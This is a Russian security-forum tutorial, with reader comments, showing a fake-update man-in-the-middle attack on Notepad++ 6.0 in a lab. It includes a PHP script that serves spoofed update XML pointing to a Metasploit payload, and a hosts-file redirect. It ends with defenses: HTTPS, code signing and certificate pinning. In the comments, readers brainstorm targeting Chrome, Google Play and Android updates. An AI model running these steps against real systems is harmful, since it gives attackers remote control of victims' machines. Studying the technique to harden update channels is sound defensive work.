• 🔥 Бесплатный курс от Академии Кодебай: «Анализ защищенности веб-приложений»

🛡 Научитесь находить и использовать уязвимости веб-приложений.
    🧠 Изучите SQLi, XSS, CSRF, IDOR и другие типовые атаки на практике.
    🧪 Погрузитесь в реальные лаборатории и взломайте свой первый сайт!
    🚀 Подходит новичкам — никаких сложных предварительных знаний не требуется.

Доступ открыт прямо сейчас Записаться бесплатно

Статья Атака через фейковое обновление: разбираем MITM на классическом примере

Атака MITM через фейковое обновление ПО

Привет, codeby.net!

Эта статья посвящена теме, которая давно не дает мне покоя, — фейковым обновлениям ПО. Меня в целом захватывает мир атак типа , особенно их реализация внутри локальной сети. И подмена обновлений — один из самых коварных векторов. Года полтора назад я наткнулся на фреймворк Evilgrade и загорелся идеей понять его механику. Первая попытка разобраться с наскока провалилась, и я, честно говоря, забил. Но сегодня я вернулся к этой теме, и на этот раз добился результата.

Сразу оговорюсь: это не пошаговая инструкция для взлома. Моя цель — разобрать методологию атаки, показать ее внутреннюю кухню на простом и наглядном примере. Суть материала — продемонстрировать, как это работает на фундаментальном уровне. Давайте выйдем за рамки скрипт-кидди и прокачаем понимание процессов. Бездумно запускать готовый софт могут все, а вот понять принципы его работы — немногие.

Теоретические основы атаки

Прежде чем погружаться в практику, давайте разберем, как вообще устроен механизм обновления большинства программ.

Этапы обновления ПО:
  1. Программа отправляет на сервер разработчика запрос для проверки новой версии (автоматически или по клику пользователя).
  2. Сервер получает запрос, проверяет наличие обновлений и отправляет ответ.
  3. Программа обрабатывает ответ: если обновление доступно — предлагает его скачать и установить, если нет — сообщает, что используется актуальная версия.
Имея это представление, мы можем выстроить четкий план атаки.

Этапы проведения атаки:
  1. Перехватить и проанализировать запрос, который программа отправляет на сервер обновлений.
  2. Изучить структуру и содержание ответа, который присылает легитимный сервер.
  3. Поднять собственный веб-сервер в локальной сети.
  4. Реализовать атаку типа , чтобы перенаправить запросы от жертвы с адреса сервера обновлений на наш локальный сервер.
  5. Сформировать на нашем сервере поддельный ответ, который будет понятен программе и будет содержать ссылку на нашу вредоносную нагрузку.
Когда этапы ясны, можно переходить к реализации. Если теория кажется туманной, не переживайте — на практике все встанет на свои места. В качестве «подопытного кролика» мы будем использовать старую версию программы , которая идеально подходит для демонстрации этого вектора атаки.

Практическая реализация

Для воспроизведения атаки в лабораторных условиях нам понадобится следующий инструментарий:
  • Notepad++ v6.0 ( ) — важно использовать именно старую версию, так как она общается с сервером по небезопасному протоколу HTTP.
  • XAMPP ( ) — для быстрого развертывания веб-сервера Apache.
  • Wireshark ( ) — наш главный инструмент для анализа сетевого трафика.
Начнем с установки Notepad++ v6.0. После установки запустите программу и инициируйте проверку обновления. Для этого в меню нажмите на ? и выберите пункт «Обновить Notepad++».

Меню обновления Notepad++

Вы увидите окно с предложением скачать новую версию. Это именно то, что нам нужно.

Окно с предложением обновления

Пока что нажимаем «Отмена» и открываем Wireshark. Выберите ваш активный сетевой интерфейс (тот, через который идет трафик в интернет).

Выбор сетевого интерфейса в Wireshark

В поле фильтра введите http и нажмите Enter. Теперь снова повторите запрос на обновление в Notepad++. Через пару секунд остановите захват пакетов в Wireshark и приступайте к анализу. В колонке Info вы легко заметите GET запрос, URL которого содержит слово update.

Перехваченный HTTP запрос в Wireshark

Изучив этот запрос более детально, мы видим Full request URI, который ведет на notepad-plus-plus.org. Чтобы убедиться, что это нужный нам эндпоинт, давайте перейдем по полному URL в браузере:

В ответ мы получим XML-документ, который сообщает программе о наличии новой версии и где ее скачать:
XML:
<GUP>
<NeedToBeUpdated>yes</NeedToBeUpdated>
<Version>7.5.9</Version>
<Location>http://notepad-plus-plus.org/repository/7.x/7.5.9/npp.7.5.9.Installer.exe</Location>
</GUP>
Отлично! Мы нашли интересующий нас запрос и знаем, какой ответ ожидает программа. Сбор информации завершен, переходим к активной фазе.

Поскольку мы работаем в лабораторных условиях, я упрощу некоторые шаги, а именно и поднятие сервера. Для чистоты эксперимента это не критично.

Устанавливаем XAMPP и запускаем модуль Apache.

Панель управления XAMPP с запущенным Apache

Переходим в корневую директорию нашего локального сайта: C:\xampp\htdocs. Здесь создаем две папки: update и repository.
  • update — обязательная папка, так как она присутствует в URL запроса. В ней будет лежать наш скрипт-ответчик.
  • repository — необязательная папка. Мы можем указать любой путь для скачивания пейлоада, но для порядка и чистоты структуры положим его сюда.
Структура папок на локальном сервере

Теперь в папке update создаем файл getDownloadUrl.php со следующим кодом:
PHP:
<?php
// Устанавливаем заголовок, чтобы клиент понял, что это XML
header('Content-type: text/xml');

// Формируем наш поддельный XML-ответ
$xml = <<<XML
<GUP>
<NeedToBeUpdated>yes</NeedToBeUpdated>
<Version>9.9.9</Version>
<Location>http://notepad-plus-plus.org/repository/payload.exe</Location>
</GUP>
XML;

// Отдаем XML клиенту
echo $xml;
?>
Как видите, код почти полностью повторяет оригинальный ответ, за одним ключевым исключением: в теге <Location> мы указываем путь к нашему файлу payload.exe.

Сам payload.exe я сгенерировал на Kali Linux с помощью msfvenom. Пример его создания можно найти в статье [Metasploit] устанавливаем обратное TCP соединение через ngrok. Готовый exe-файл поместите в папку C:\xampp\htdocs\repository.

Важное замечание: стандартные пейлоады, сгенерированные Metasploit, сегодня легко обнаруживаются практически любым антивирусом. В реальных условиях атакующие используют продвинутые техники обфускации, шифрования и загрузчики, написанные на заказ.

Давайте убедимся, что все настроено правильно. Перейдите в браузере по адресу http://localhost/repository/ и проверьте, что ваш payload.exe на месте.

Проверка наличия payload.exe на локальном сервере

Затем откройте http://localhost/update/getDownloadUrl.php, чтобы увидеть сгенерированный XML.

Проверка XML-ответа от локального сервера

Если у вас все выглядит так же, как на скриншотах, — вы на верном пути!

Остался последний шаг: заставить систему жертвы отправлять запросы на наш локальный сервер вместо настоящего. В реальной атаке для этого используются техники ARP-spoofing + DNS-spoofing (например, с помощью arpspoof и dnsspoof в Kali). Мы же, для простоты, отредактируем файл hosts на атакуемой машине.

Откройте с правами администратора файл C:\Windows\System32\drivers\etc\hosts и добавьте в конец строку:
Bash:
127.0.0.1 notepad-plus-plus.org
Эта запись заставит ОС при обращении к домену notepad-plus-plus.org перенаправлять весь трафик на 127.0.0.1 (localhost), то есть на наш XAMPP-сервер.

Подготовка завершена. Время для проверки.

Возвращаемся в Notepad++ и снова запускаем проверку обновления. Программа обратится к notepad-plus-plus.org, но благодаря нашей манипуляции с hosts попадет на наш сервер. Наш скрипт отдаст поддельный XML, и программа предложит скачать «обновление». Соглашаемся.

После скачивания появится окно установщика.

Запрос на запуск скачанного обновления

Соглашаемся на запуск. Notepad++ закроется, а наш payload.exe выполнится, предоставляя нам контроль над машиной. В моем случае — я получил сессию Meterpreter.

Успешное получение сессии Meterpreter

Почему сегодня эта атака (в чистом виде) почти не работает?

Важно понимать, что описанный метод является классическим и сегодня сработает только против очень старого или плохо написанного софта. Современные приложения защищены от таких атак несколькими уровнями безопасности:
  1. HTTPS: Абсолютное большинство программ сегодня использует для обновлений зашифрованный протокол HTTPS. Это сразу же рушит всю атаку, так как мы не можем ни прочитать запрос, ни подменить ответ без манипуляций с TLS-сертификатами, что является отдельной, гораздо более сложной задачей.
  2. Проверка цифровой подписи: Надежные разработчики подписывают свои инсталляторы цифровой подписью. Даже если бы нам удалось подсунуть пользователю наш payload.exe, операционная система или сама программа-обновлятор перед запуском проверила бы подпись. Обнаружив, что файл подписан не доверенным издателем (или не подписан вовсе), она бы заблокировала его выполнение.
  3. Certificate Pinning: Некоторые особо защищенные приложения «зашивают» в себя отпечаток легитимного SSL-сертификата сервера обновлений. При попытке MITM-атаки с подменой сертификата приложение обнаружит несоответствие и просто прервет соединение.

Выводы

Надеюсь, эта статья оказалась полезной и вы узнали что-то новое. Несмотря на то, что описанный вектор атаки устарел, он прекрасно иллюстрирует фундаментальные принципы атак класса Man-in-the-Middle. Понимание того, как программы общаются по сети, как анализировать их трафик и как можно манипулировать этим общением, — это основа основ для любого специалиста по кибербезопасности.

Знания, которые вы получили, — это инструмент. А как его использовать, зависит только от вас. Удачи на просторах Codeby!

Последнее редактирование:
Гениально. А главное, что антивирус не сработает, файрволл будет молчать, а все потому, что обновление будет осуществлять программой из системы. Но есть одно НО! разве ПО, допустим тот же самый Chrome просто тупо скачивает обновление без проверки сертификата, подписи и хэша, установки соединений только по https и т.д. ? никакой верификации???

Гениально. А главное, что антивирус не сработает, файрволл будет молчать, а все потому, что обновление будет осуществлять программой из системы. Но есть одно НО! разве ПО, допустим тот же самый Chrome просто тупо скачивает обновление без проверки сертификата, подписи и хэша, установки соединений только по https и т.д. ? никакой верификации???

Разное ПО надо рассматривать индивидуально. Думаю что у chrome будет все намного сложнее, как раз токи там будет проверка сертификат. Почти уверен на 100%. Но не нужно упираться в один chrome, не сработало с одно программой можно найти другую ;)

Разное ПО надо рассматривать индивидуально. Думаю что у chrome будет все намного сложнее, как раз токи там будет проверка сертификат. Почти уверен на 100%. Но не нужно упираться в один chrome, не сработало с одно программой можно найти другую ;)
А обновление google play market? ios? допустим у гугла провести такую атаку???

добрый вечер, а как быть с подписанными программами?

А обновление google play market? ios? допустим у гугла провести такую атаку???
Я еще не пробовал копать в этом направлении
добрый вечер, а как быть с подписанными программами?
Не дошел до этой ситуации по этому не могу сказать что делать.

p.s В ближайшем будущем хочу исследовать более сложные варианты. Если добьюсь положительного результат, тогда смогу поделиться опытом. Так как данный вектор атаки никто не раскрывает приходиться изучать все самому. У меня больше вопрос на текущий момент чем ответов)

Последнее редактирование:
  • Нравится
Реакции: Baracuda и kot-gor
first thank you for sharing, can you do that with andoid apps ??

О, даже и не думал о таких обновлениях. Я думаю, что можно использовать arp spoofing для перехвата пакетов. Предварительно нужно написать софт, который при перехвате на определенный адрес, например на сервер notepad++, будет обрывать передачу и отправлять ответ с новым обновлением, ну и дать загрузиться. Такое возможно думаю. Только чтобы оборвать пакет, вроде нужно использовать bpf или firewall настроенный на определенные адреса исходящие.

Интересно, можно ли написать драйвер или с помощью bpf сделать так, чтобы нужный запрос переадресовать к себе, чтобы всего подключения к другому хосту приравнивались как к твоему. тогда бы можно было упростить некоторые вещи в плане генерации пакетов tcp и так далее.

Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab